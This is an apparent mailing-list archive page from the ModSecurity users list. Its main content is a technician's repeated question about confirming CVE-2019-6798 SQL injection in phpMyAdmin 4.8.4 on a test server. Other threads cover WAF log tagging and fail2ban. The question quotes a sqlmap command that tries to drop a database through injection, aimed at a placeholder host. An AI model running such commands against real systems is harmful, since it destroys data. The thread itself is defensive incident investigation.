> Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.
>
> Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.
>
> No matter how many commands I try, sqlmap always reports that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.
>
> $ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"
>
> Replace database by database name.
>
> May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.
>
> Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.
>
> Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?
>
> Please advise.
>
> Thank you very much.
>
> -----BEGIN EMAIL SIGNATURE-----
>
> The Gospel for all Targeted Individuals (TIs):
>
> [The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
>
> Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
>
> ********************************************************************************************
>
> Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019
>
> [1] https://tdtemcerts.wordpress.com/
> [2] https://tdtemcerts.blogspot.sg/
> [3] https://www.scribd.com/user/270125049/Teo-En-Ming
>
> -----END EMAIL SIGNATURE-----
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/
From: Reindl H. <h.r...@th...> - 2019-04-17 14:46:55
On 17.04.19 at 16:24, Turritopsis Dohrnii Teo En Ming wrote:
> Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Are you finally done with posting the same message to several mailing lists, and more than once?
From: Turritopsis D. T. En M. <ce...@te...> - 2019-04-17 14:37:05
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.

No matter how many commands I try, sqlmap always reports that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/
[2] https://tdtemcerts.blogspot.sg/
[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----
From: Turritopsis D. T. En M. <ce...@te...> - 2019-04-17 14:24:38
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.

No matter how many commands I try, sqlmap always reports that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/
[2] https://tdtemcerts.blogspot.sg/
[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----
From: Turritopsis D. T. En M. <tdt...@gm...> - 2019-04-17 14:15:25
Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.

No matter how many commands I try, sqlmap always reports that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/
[2] https://tdtemcerts.blogspot.sg/
[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----
From: Christian F. <chr...@ne...> - 2019-04-16 05:02:11
Hello Claude,
Good one. If you are satisfied with the info as a tag, then this is a nice
solution. I thought you _needed_ it in the "hostname" field.
Cheers,
Christian
On Sun, Apr 14, 2019 at 06:44:43PM +0000, Claude Cocault wrote:
> Hi Christian
>
> Yes we can
>
> In crs-setup.conf i change
> SecDefaultAction "phase:1,log,auditlog,pass"
> SecDefaultAction "phase:2,log,auditlog,pass"
> by
> SecDefaultAction "phase:1,log,auditlog,pass,tag:'VirtualHost: %{request_headers.host}'"
> SecDefaultAction "phase:2,log,auditlog,pass,tag:'VirtualHost: %{request_headers.host}'"
> And i obtain:
> [client x.x.x.x] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "C:\/Program Files/ModSecurity IIS/owasp_crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "57"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "VirtualHost: test-xss.gi3f.fr"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "TEST-WEB"] [uri "/verif.php"] [unique_id "18230571293743251474"]
>
> where i get [tag "VirtualHost: test-xss.gi3f.fr"] in the log message
>
> Thanks
>
> Best regards
>
> ________________________________
> From: Ervin Hegedüs <ai...@gm...>
> Sent: Sunday, 14 April 2019 12:26
> To: mod...@li...
> Subject: Re: [mod-security-users] Problem with message in EventLog
>
> Hi Claude,
>
> On Sun, Apr 14, 2019 at 09:01:27AM +0000, Claude Cocault wrote:
> > Hi Christian,
> >
> > Thank you for your answer.
> > Maybe a future evolution ?
>
> in V3 (aka libmodsecurity3) it is possible to log the custom
> fields, but it depends on the application developer - so,
> simplifying a lot, it also needs code :).
>
>
>
> a.
>
>
>
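For anyone consuming the line Claude quoted above (the same bracketed format the IIS build writes to the Event Log), here is an added example, not from the thread: it splits a ModSecurity v2 message into its free-text prefix and its `[name "value"]` fields, collects the repeated `[tag ...]` fields into a list, and pulls out the `VirtualHost:` tag that the SecDefaultAction change injects, so a SIEM forwarder can key on the site instead of the machine hostname. The sample line, its client address and the helper names are constructed for the example.

```python
import re

# Constructed from the line quoted in the thread; the VirtualHost tag comes from
# the SecDefaultAction change that adds tag:'VirtualHost: %{request_headers.host}'.
SAMPLE_LINE = (
    '[client 192.0.2.20] ModSecurity: Access denied with code 403 (phase 2). '
    'Operator GE matched 5 at TX:anomaly_score. '
    '[file "C:\\/Program Files/ModSecurity IIS/owasp_crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] '
    '[line "57"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] '
    '[severity "CRITICAL"] [tag "VirtualHost: test-xss.gi3f.fr"] [tag "application-multi"] '
    '[tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] '
    '[hostname "TEST-WEB"] [uri "/verif.php"] [unique_id "18230571293743251474"]'
)

# One bracketed field: [name "value"]; the value may contain backslash escapes
# (ModSecurity escapes embedded quotes and, as above, Windows path separators).
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
# The leading [client a.b.c.d] prefix is not quoted, so it needs its own pattern.
CLIENT_RE = re.compile(r'^\[client ([^\]]+)\]')
MULTI_VALUED = {"tag"}  # fields that legitimately repeat within one line


def parse_modsec_error_line(line):
    """Split a ModSecurity v2 error message into its prefix text and bracketed fields."""
    fields = {"tag": []}
    client = CLIENT_RE.match(line)
    if client:
        fields["client"] = client.group(1)
    for name, raw in FIELD_RE.findall(line):
        value = re.sub(r'\\(.)', r'\1', raw)  # undo ModSecurity's backslash escaping
        if name in MULTI_VALUED:
            fields[name].append(value)
        else:
            fields[name] = value
    # Everything between the client prefix and the first quoted field is the
    # human-readable message ("Access denied with code 403 ...").
    first = FIELD_RE.search(line)
    prefix = line[: first.start()] if first else line
    if client:
        prefix = prefix[client.end():]
    fields["message"] = prefix.strip()
    return fields


def virtual_host(fields, prefix="VirtualHost: "):
    """Return the host recorded by the custom VirtualHost tag, or None if absent."""
    for tag in fields.get("tag", []):
        if tag.startswith(prefix):
            return tag[len(prefix):]
    return None


def summarise(line):
    """Flatten one log line into the handful of keys a SIEM rule would match on."""
    f = parse_modsec_error_line(line)
    return {
        "client": f.get("client"),
        "vhost": virtual_host(f),
        "rule_id": f.get("id"),
        "uri": f.get("uri"),
        "severity": f.get("severity"),
        "anomaly_msg": f.get("msg"),
        "unique_id": f.get("unique_id"),
    }
```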
From: Boris K. <bor...@gm...> - 2019-04-15 14:49:58
|
Ervin thanks.

On Mon, 15 Apr 2019, 13:58 Ervin Hegedüs, <ai...@gm...> wrote:

> Hi Boris,
>
> On Mon, Apr 15, 2019 at 01:45:37PM +0200, Boris Kočar wrote:
> > Hi, thanks all for the answer. I found something similar.
> >
> > https://www.nginx.com/blog/dynamic-ip-blacklisting-with-nginx-plus-and-fail2ban/
> >
> > Need to think how to cluster fail2ban or iptables if there are 2 or more nginx.
>
> I think you just have to care with fail2ban - and there are so many
> good posts on the internet, e.g.:
>
> https://www.blackhillsinfosec.com/configure-distributed-fail2ban/
>
> a.